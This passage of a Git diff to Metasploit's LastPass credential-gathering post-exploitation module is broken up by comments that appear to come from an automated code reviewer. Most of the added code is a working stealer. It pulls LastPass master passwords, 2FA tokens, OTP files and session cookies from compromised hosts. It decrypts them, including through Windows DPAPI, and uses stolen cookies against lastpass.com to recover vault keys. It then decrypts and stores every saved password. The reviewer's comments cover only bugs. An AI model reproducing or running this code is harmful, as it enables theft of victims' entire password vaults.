has no root access) + elsif browser == "Firefox" # Special case for Firefox + paths |= firefox_profile_files(path) else - paths |= file_paths(path, browser, account) + paths |= file_paths(path) end vprint_good "Found #{paths.size} #{browser} databases for #{account}" 
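Review bot: The `db_paths.size > 0` guard in build_account_map passes for Firefox even when no profile was found. firefox_profile_files (changed in the `@@ -242,72 +218,595 @@` hunk) now returns `[found_dbs_paths]`, and find_db_paths (the `@@ -172,11 +160,14 @@` hunk) merges that into `paths` as a single nested element, so the size is 1 even when the inner list is empty. In that case `lp_db_path` is stored as an empty array, the browser entry is kept, and the later `lp_data['lp_db_path'].first` is `nil`, which ie_firefox_credentials treats as the IE case. Testing the flattened list, `if db_paths && !db_paths.flatten.empty?`, lets the existing delete branch handle it. Alternatively, firefox_profile_files could return `[]` when it found nothing, which fixes it at the source.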
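Review bot: The IE branch in find_db_paths reads `HKEY_CURRENT_USER`, which is the hive of the user the session runs as, yet build_account_map calls it once per profile and files the result under that profile's `account`. The `path != "Low\\LastPass"` comparison only detects that `LocalAppData` interpolated to an empty string, so it appears to stand in for "is this profile readable by the session user" without saying so. A comment on that line, for example `# HKCU belongs to the session user; skip profiles whose LocalAppData did not resolve`, would record the assumption. find_db_paths begins and ends outside this hunk.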
@@ -188,11 +179,7 @@ class Metasploit3 < Msf::Post user_profiles = [] case session.platform when /unix|linux/ - if session.type == "meterpreter" - user_names = client.fs.dir.entries("/home") - else - user_names = session.shell_command("ls /home").split - end + user_names = dir("/home") user_names.reject! { |u| %w(. ..).include?(u) } user_names.each do |user_name| user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") @@ -216,25 +203,14 @@ class Metasploit3 < Msf::Post end # Extracts the databases paths from the given folder ignoring . and .. - def file_paths(path, browser, account) + def file_paths(path) found_dbs_paths = [] files = [] - if directory?(path) - sep = session.platform =~ /win/ ? '\\' : '/' - if session.type == "meterpreter" - files = client.fs.dir.entries(path) - elsif session.type == "shell" - files = session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return found_dbs_paths - end - end - + files = dir(path) if directory?(path) files.each do |file_path| unless %w(. .. Shared).include?(file_path) - found_dbs_paths.push([path, file_path].join(sep)) + found_dbs_paths.push([path, file_path].join(system_separator)) end end 
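Review bot: The comment above file_paths says the method ignores `.` and `..`, but the loop also drops an entry named `Shared`, and the hunk gives no reason for that. I would extend the comment to `# Extracts the database paths from the given folder, skipping ".", ".." and "Shared"`. The separate `files = []` initialisation could also fold into `files = directory?(path) ? dir(path) : []`. The end of file_paths lies outside the hunk.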
@@ -242,72 +218,595 @@ class Metasploit3 < Msf::Post end # Returns the profile files for Firefox - def firefox_profile_files(path, browser) + def firefox_profile_files(path) found_dbs_paths = [] if directory?(path) - sep = session.platform =~ /win/ ? '\\' : '/' - if session.type == "meterpreter" - files = client.fs.dir.entries(path) - elsif session.type == "shell" - files = session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return found_dbs_paths - end - + files = dir(path) files.reject! { |file| %w(. ..).include?(file) } files.each do |file_path| - found_dbs_paths.push([path, file_path, 'prefs.js'].join(sep)) if file_path.match(/.*\.default/) + found_dbs_paths.push([path, file_path, 'prefs.js'].join(system_separator)) if file_path.match(/.*\.default/) end end - found_dbs_paths + [found_dbs_paths] end # Parses the Firefox preferences file and returns encoded credentials - def firefox_credentials(loot_path) + def ie_firefox_credentials(prefs_path, localstorage_db_path) credentials = [] - File.readlines(loot_path).each do |line| - if /user_pref\("extensions.lastpass.loginpws", "(?<encoded_creds>.*)"\);/ =~ line - creds_per_user = encoded_creds.split("|") - creds_per_user.each do |user_creds| - parts = user_creds.split('=') - # Any valid credentials present? - credentials << parts if parts.size > 1 - end - else - next + data = nil + + if prefs_path.nil? # IE + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") + data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") if data.blank? + return [] if data.blank? + + usernames = data.split("|") + usernames.each do |username| + credentials << [username, nil] end + + # Extract master passwords + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginPws") + data = Rex::Text.encode_base64(data) unless data.blank? 
+ else # Firefox + loot_path = loot_file(prefs_path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file") + return [] unless loot_path + File.readlines(loot_path).each do |line| + if /user_pref\("extensions.lastpass.loginusers", "(?<encoded_users>.*)"\);/ =~ line + usernames = encoded_users.split("|") + usernames.each do |username| + credentials << [username, nil] + end + break + end + end + + # Extract master passwords + path = localstorage_db_path + system_separator + "lp.loginpws" + data = read_remote_file(path) if file?(path) # Read file if it exists end + # Get encrypted master passwords + data = windows_unprotect(data) if data != nil && data.match(/^AQAAA.+/) # Verify Windows protection + return credentials if data.blank? # No passwords stored + creds_per_user = data.split("|") + creds_per_user.each_with_index do |user_creds, index| + parts = user_creds.split('=') + for creds in credentials + creds[1] = parts[1] if creds[0] == parts[0] # Add the password to the existing username + end + end credentials end - # Decrypts the password - def clear_text_password(email, encrypted_data) - return if encrypted_data.blank? + def decrypt_data(key, encrypted_data) + return nil if encrypted_data.blank? - sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(email) - sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin - - if encrypted_data.include?("|") # Apply CBC + if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") - decipher.decrypt - decipher.key = sha256_binary_email # The key is the emails hashed to SHA256 and converted to binary - decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and | - encrypted_password = encrypted_data[26..-1] - else # Apply ECB + decipher.iv = Rex::Text.decode_base64(encrypted_data[1, 24]) # Discard ! 
and | + encrypted_data = encrypted_data[26..-1] # Take only the data part + else # Use ECB decipher = OpenSSL::Cipher.new("AES-256-ECB") - decipher.decrypt - decipher.key = sha256_binary_email - encrypted_password = encrypted_data end begin - decipher.update(Base64.decode64(encrypted_password)) + decipher.final - rescue - print_error "Password for #{email} could not be decrypted" + decipher.decrypt + decipher.key = key + decrypted_data = decipher.update(Rex::Text.decode_base64(encrypted_data)) + decipher.final + rescue OpenSSL::Cipher::CipherError => e + vprint_error "Data could not be decrypted. #{e.message}" + end + + decrypted_data + end + + def extract_credentials(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + account_map[account][browser]['lp_creds'] = {} + if browser.match(/Firefox|IE/) + if browser == "Firefox" + ieffcreds = ie_firefox_credentials(lp_data['lp_db_path'].first, lp_data['localstorage_db']) + else # IE + ieffcreds = ie_firefox_credentials(nil, lp_data['localstorage_db']) + end + unless ieffcreds.blank? + ieffcreds.each do |creds| + if creds[1].blank? # No master password found + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = { 'lp_password' => nil } + else + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = { 'lp_password' => creds[1] } + end + end + end + else # Chrome, Safari and Opera + loot_path = loot_file(lp_data['lp_db_path'], nil, "#{browser.downcase}.lastpass.database", "application/x-sqlite3", "#{account}'s #{browser} LastPass database #{lp_data['lp_db_path']}") + account_map[account][browser]['lp_db_loot'] = loot_path + next if loot_path.blank? 
+ # Parsing/Querying the DB + db = SQLite3::Database.new(loot_path) + result = db.execute( + "SELECT username, password FROM LastPassSavedLogins2 " \ + "WHERE username IS NOT NULL AND username != '' " \ + ) + + for row in result + if row[0] + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password + account_map[account][browser]['lp_creds'][row[0]] = { 'lp_password' => row[1] } + end + end + end + end end end + + # Extracts the 2FA token from localStorage + def extract_2fa_tokens(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + if browser.match(/Firefox|IE/) + path = lp_data['localstorage_db'] + system_separator + "lp.suid" + data = read_remote_file(path) if file?(path) # Read file if it exists + data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection + loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") + account_map[account][browser]['lp_2fa'] = data + else # Chrome, Safari and Opera + loot_path = loot_file(lp_data['localstorage_db'], nil, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") + unless loot_path.blank? + db = SQLite3::Database.new(loot_path) + token = db.execute( + "SELECT hex(value) FROM ItemTable " \ + "WHERE key = 'lp.uid';" + ).flatten + end + token.blank? ? 
account_map[account][browser]['lp_2fa'] = nil : account_map[account][browser]['lp_2fa'] = token.pack('H*') + end + end + end + end + + # Print all extracted LastPass data + def print_lastpass_data(account_map) + lastpass_data_table = Rex::Ui::Text::Table.new( + 'Header' => "LastPass Accounts", + 'Indent' => 1, + 'Columns' => %w(Account LP_Username LP_Password LP_2FA LP_Key) + ) + + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + lastpass_data_table << [account, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] + end + end + end + + unless account_map.empty? + print_good lastpass_data_table.to_s + loot_file(nil, lastpass_data_table.to_csv, "lastpass.data", "text/csv", "LastPass Data") + print_vault_passwords(account_map) + end + end + + def extract_vault_and_iterations(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + if browser.match(/Firefox|IE/) + if browser == "Firefox" + iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" + else # IE + iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" + end + iterations = read_remote_file(iterations_path) if file?(iterations_path) # Read file if it exists + iterations = nil if iterations.blank? 
# Verify content + lp_data['lp_creds'][username]['iterations'] = iterations + + # Find encrypted vault + vault = read_remote_file(vault_path) + vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection + vault = vault.sub(/iterations=.*;/, "") if file?(vault_path) # Remove iterations info + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") + lp_data['lp_creds'][username]['vault_loot'] = loot_path + + else # Chrome, Safari and Opera + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = ? AND type = 'accts'", OpenSSL::Digest::SHA256.hexdigest(username) + ) + + if result.size == 1 && !result[0].blank? + if /iterations=(?<iterations>.*);(?<vault>.*)/ =~ result[0][0] + lp_data['lp_creds'][username]['iterations'] = iterations + else + lp_data['lp_creds'][username]['iterations'] = 1 + end + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") + lp_data['lp_creds'][username]['vault_loot'] = loot_path + else + lp_data['lp_creds'][username]['iterations'] = nil + lp_data['lp_creds'][username]['vault_loot'] = nil + end + end + end + end + end + end + + def extract_vault_keys(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + browser_checked = false # Track if local stored vault key was already decrypted for this browser (only one session cookie) + lp_data['lp_creds'].each_pair do |username, user_data| + if !user_data['lp_password'].blank? 
&& user_data['iterations'] != nil # Derive vault key from credentials + lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) + else # Get vault key decrypting the locally stored one or from the disabled OTP + unless browser_checked + decrypt_local_vault_key(account, browser_map) + browser_checked = true + end + if lp_data['lp_creds'][username]['vault_key'].nil? # If no vault key was found yet, try with dOTP + otpbin = extract_otpbin(browser, username, lp_data) + otpbin.blank? ? next : otpbin = otpbin[0..31] + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) + end + end + end + end + end + end + + # Decrypt the locally stored vault key + def decrypt_local_vault_key(account, browser_map) + data = nil + session_cookie_value = nil + + browser_map.each_pair do |browser, lp_data| + if browser == "IE" && directory?(lp_data['cookies_db']) + cookies_files = dir(lp_data['cookies_db']) + cookies_files.reject! { |u| %w(. ..).include?(u) } + cookies_files.each do |cookie_jar_file| + data = read_remote_file(lp_data['cookies_db'] + system_separator + cookie_jar_file) + next if data.blank? 
+ if /.*PHPSESSID.(?<session_cookie_value_match>.*?).lastpass\.com?/m =~ data # Find the session id + loot_file(lp_data['cookies_db'] + system_separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") + session_cookie_value = session_cookie_value_match + break + end + end + else + case browser + when /Chrome/ + query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" + when "Opera" + query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" + when "Firefox" + query = "SELECT value FROM moz_cookies WHERE host = 'lastpass.com' AND name = 'PHPSESSID'" + else + vprint_error "Browser #{browser} not supported for cookies" + next + end + # Parsing/Querying the DB + loot_path = loot_file(lp_data['cookies_db'], nil, "#{browser.downcase}.lastpass.cookies", "application/x-sqlite3", "#{account}'s #{browser} cookies DB") + next if loot_path.blank? + db = SQLite3::Database.new(loot_path) + begin + result = db.execute(query) + rescue SQLite3::SQLException => e + vprint_error "No session cookie was found in #{account}'s #{browser} (#{e.message})" + next + end + next if result.blank? # No session cookie found for this browser + session_cookie_value = result[0][0] + end + return if session_cookie_value.blank? 
+ + # Check if cookie value needs to be decrypted + if Rex::Text.encode_base64(session_cookie_value).match(/^AQAAA.+/) # Windows Data protection API + session_cookie_value = windows_unprotect(Rex::Text.encode_base64(session_cookie_value)) + elsif session_cookie_value.match(/^v10/) && browser.match(/Chrome|Opera/) # Chrome/Opera encrypted cookie in Linux + begin + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.decrypt + decipher.key = OpenSSL::Digest::SHA256.hexdigest("peanuts") + decipher.iv = " " * 16 + session_cookie_value = session_cookie_value[3..-1] # Discard v10 + session_cookie_value = decipher.update(session_cookie_value) + decipher.final + rescue OpenSSL::Cipher::CipherError => e + print_error "Cookie could not be decrypted. #{e.message}" + end + end + + # Use the cookie to obtain the encryption key to decrypt the vault key + uri = URI('https://lastpass.com/login_check.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("wxsessid" => URI.unescape(session_cookie_value), "uuid" => browser_map['lp_2fa']) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } + + # Parse response + next unless response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired + decryption_key = OpenSSL::Digest::SHA256.hexdigest(response.body.match(/pwdeckey\="([a-z0-9]+)"/)[1]) + username = response.body.match(/lpusername="([A-Za-z0-9._%+-@]+)"/)[1] + + # Get the local encrypted vault key + encrypted_vault_key = extract_local_encrypted_vault_key(browser, username, lp_data) + + # Decrypt the local stored key + lp_data['lp_creds'][username]['vault_key'] = decrypt_data([decryption_key].pack("H*"), encrypted_vault_key) + end + end + + # Returns otp, encrypted_key + def extract_otpbin(browser, username, lp_data) + if browser.match(/Firefox|IE/) + if browser == "Firefox" + path = lp_data['localstorage_db'] + system_separator + 
OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + else # IE + path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" + end + otpbin = read_remote_file(path) if file?(path) # Read file if it exists + otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) + return otpbin + else # Chrome, Safari and Opera + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT type, data FROM LastPassData " \ + "WHERE username_hash = ? AND type = 'otp'", OpenSSL::Digest::SHA256.hexdigest(username) + ) + return (result.blank? || result[0][1].blank?) ? nil : [result[0][1]].pack("H*") + end + end + + def derive_vault_key_from_creds(username, password, key_iteration_count) + if key_iteration_count == 1 + key = Digest::SHA256.hexdigest username + password + else + key = pbkdf2(password, username, key_iteration_count.to_i, 32).first + end + key + end + + def decrypt_vault_key_with_otp(username, otpbin) + vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*" + encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otpbin) + decrypt_data(vault_key_decryption_key, encrypted_vault_key) + end + + def retrieve_encrypted_vault_key_with_otp username, otpbin + # Derive login hash from otp + otp_token = lastpass_sha256(lastpass_sha256(username + otpbin) + otpbin) # OTP login hash + + # Make request to LastPass + uri = URI('https://lastpass.com/otp.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("login" => 1, "xml" => 1, "hash" => otp_token, "otpemail" => URI.escape(username), "outofbandsupported" => 1, "changepw" => otp_token) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } + + # Parse response + encrypted_vault_key = nil + if response.body.match(/randkey\="(.*)"/) + encrypted_vault_key = 
response.body.match(/randkey\="(.*)"/)[1] + end + encrypted_vault_key + end + + # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) + def lastpass_sha256(input) + output = "" + + input = input.gsub("\r\n", "\n") + + input.each_byte do |e| + if 128 > e + output += e.chr + else + if (127 < e && 2048 > e) + output += (e >> 6 | 192).chr + output += (e & 63 | 128).chr + else + output += (e >> 12 | 224).chr + output += (e >> 6 & 63 | 128).chr + end + end + end + + OpenSSL::Digest::SHA256.hexdigest(output) + end + + def pbkdf2(password, salt, iterations, key_length) + digest = OpenSSL::Digest::SHA256.new + OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*' + end + + def windows_unprotect(data) + data = Rex::Text.decode_base64(data) + rg = session.railgun + pid = session.sys.process.getpid + process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) + mem = process.memory.allocate(data.length + 200) + process.memory.write(mem, data) + + if session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86" + addr = [mem].pack("V") + len = [data.length].pack("V") + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) + len, addr = ret["pDataOut"].unpack("V2") + else + addr = Rex::Text.pack_int64le(mem) + len = Rex::Text.pack_int64le(data.length) + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) + pData = ret["pDataOut"].unpack("VVVV") + len = pData[0] + (pData[1] << 32) + addr = pData[2] + (pData[3] << 32) + end + + return "" if len == 0 + process.memory.read(addr, len) + end + + def print_vault_passwords(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + lastpass_vault_data_table = Rex::Ui::Text::Table.new( + 'Header' => "Decrypted vault from #{username}", + 'Indent' => 1, + 'Columns' => %w(URL Username Password) + ) + 
if user_data['vault_loot'].nil? # Was a vault found? + print_error "No vault was found for #{username}" + next + end + encoded_vault = File.read(user_data['vault_loot']) + if encoded_vault[0] == "!" # Vault is double encrypted + encoded_vault = decrypt_data([user_data['vault_key']].pack("H*"), encoded_vault) + if encoded_vault.blank? + print_error "Vault from #{username} could not be decrypted" + next + else + encoded_vault = encoded_vault.sub("LPB64", "") + end + end + + # Parse vault + vault = Rex::Text.decode_base64(encoded_vault) + vault.scan(/ACCT/) do |result| + chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1] + 3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk + chunk = vault[$~.offset(0)[0]..$~.offset(0)[1] + chunk_length] # Get ACCT chunk + account_data = parse_vault_account(chunk, user_data['vault_key']) + lastpass_vault_data_table << account_data if account_data != nil + end + + unless account_map.empty? # Loot passwords + if lastpass_vault_data_table.rows.empty? + print_status('No decrypted vaults.') + else + print_good lastpass_vault_data_table.to_s + end + loot_file(nil, lastpass_vault_data_table.to_csv, "#{browser.downcase}.lastpass.passwords", "text/csv", "LastPass Vault Passwords from #{username}") + end + end + end + end + end + + def parse_vault_account(chunk, vault_key) + pointer = 22 # Starting position to find data to decrypt + labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] + vault_data = [] + for label in labels + if chunk[pointer..pointer + 3].nil? + # Out of bound read + return nil + end + + length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) + encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] + label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") + decrypted_data = "" if decrypted_data.nil? 
+ vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") + pointer = pointer + 4 + length + end + + return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes + end + + def decrypt_vault_password(key, encrypted_data) + return nil if key.blank? || encrypted_data.blank? + + if encrypted_data[0] == "!" # Apply CBC + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.iv = encrypted_data[1, 16] # Discard ! + encrypted_data = encrypted_data[17..-1] + else # Apply ECB + decipher = OpenSSL::Cipher.new("AES-256-ECB") + end + decipher.decrypt + decipher.key = [key].pack "H*" + + begin + return decipher.update(encrypted_data) + decipher.final + rescue OpenSSL::Cipher::CipherError + vprint_error "Vault password could not be decrypted with key #{key}" + return nil + end + end + + # Reads a remote file and loots it + def loot_file(path, data, title, type, description) + data = read_remote_file(path) if data.nil? # If no data is passed, read remote file + return nil if data.nil? + + loot_path = store_loot( + title, + type, + session, + data, + nil, + description + ) + loot_path + end + + # Reads a remote file and returns the data + def read_remote_file(path) + data = nil + + begin + data = read_file(path) + rescue EOFError + vprint_error "Error reading file #{path} It could be empty" + end + data + end + + def read_registry_key_value(key, value) + begin + root_key, base_key = session.sys.registry.splitkey(key) + reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + return nil unless reg_key + reg_value = reg_key.query_value(value) + return nil unless reg_value + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error("#{e.message} (#{key}\\#{value})") + end + reg_key.close if reg_key + return reg_value.blank? ? 
nil : reg_value.data + end + + def extract_local_encrypted_vault_key(browser, username, lp_data) + if browser.match(/Firefox|IE/) + encrypted_key_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" + encrypted_vault_key = read_remote_file(encrypted_key_path) + encrypted_vault_key = windows_unprotect(encrypted_vault_key) if encrypted_vault_key != nil && encrypted_vault_key.match(/^AQAAA.+/) # Verify Windows protection + else + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = ? AND type = 'key'", OpenSSL::Digest::SHA256.hexdigest(username) + ) + encrypted_vault_key = result[0][0] + end + + return encrypted_vault_key.blank? ? nil : encrypted_vault_key.split("\n")[0] # Return only the key, not the "lastpass rocks" part + end + + # Returns OS separator in a session type agnostic way + def system_separator + return session.platform =~ /win/ ? '\\' : '/' + end end diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index c16ef69a6c..3f6808328b 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 4bd3f3e381..57bda43abc 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 09c3450e84..2ad6857412 100644 --- a/modules/post/multi/gather/pgpass_creds.rb 
+++ b/modules/post/multi/gather/pgpass_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 437ea9b73a..4d2e4a4ef4 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 1c76b839a8..39feb3399d 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index a7f9b7ff42..b8e72f70a5 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/resolve_hosts.rb b/modules/post/multi/gather/resolve_hosts.rb index a5ccaa1a6c..7eefecdb1b 100644 --- a/modules/post/multi/gather/resolve_hosts.rb +++ b/modules/post/multi/gather/resolve_hosts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/rsyncd_creds.rb b/modules/post/multi/gather/rsyncd_creds.rb index ee0736848e..dafcb3aa48 100644 --- a/modules/post/multi/gather/rsyncd_creds.rb 
+++ b/modules/post/multi/gather/rsyncd_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/rubygems_api_key.rb b/modules/post/multi/gather/rubygems_api_key.rb index bd732bdbe5..422ccce460 100644 --- a/modules/post/multi/gather/rubygems_api_key.rb +++ b/modules/post/multi/gather/rubygems_api_key.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index 771391e748..dcefb554a0 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index b07ccd6090..578855b1f4 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -11,7 +11,7 @@ require 'csv' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index b5746e929e..ceb2ccf86a 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'sshkey' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index bcda33c4ac..00c2fb9c20 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb 
